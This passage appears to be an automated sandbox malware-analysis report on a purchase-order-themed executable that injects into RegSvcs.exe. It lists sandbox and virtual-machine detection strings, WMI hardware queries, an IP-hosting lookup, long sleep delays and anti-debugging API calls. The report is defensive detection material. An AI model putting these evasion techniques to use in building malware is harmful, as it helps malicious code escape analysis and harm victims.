                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeAPI/Special instruction interceptor: Address: 397367C
                  Source: RegSvcs.exe, 00000002.00000002.4941689440.0000000005060000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4940216324.00000000038D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4940845713.0000000004DB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4938021567.000000000260F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLLESELECT * FROM WIN32_COMPUTERSYSTEM
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599891Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599547Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599438Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599313Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599188Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599063Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598953Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598844Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1435Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8376Jump to behavior
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-87061
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeAPI coverage: 4.1 %
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599891Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599547Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599438Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599313Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599188Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599063Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598953Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598844Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593985Jump to behavior
                  Source: RegSvcs.exe, 00000002.00000002.4938021567.000000000260F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmware
                  Source: RegSvcs.exe, 00000002.00000002.4938021567.000000000260F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVBox
                  Source: RegSvcs.exe, 00000002.00000002.4941542806.0000000004FC3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI call chain: ExitProcess graph end node

                  Anti Debugging

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F51600 CheckRemoteDebuggerPresent,2_2_05F51600
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_039722B8 mov eax, dword ptr fs:[00000030h]0_2_039722B8
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_03973948 mov eax, dword ptr fs:[00000030h]0_2_03973948
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_039738E8 mov eax, dword ptr fs:[00000030h]0_2_039738E8
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040CE09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040E61C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00416F6A
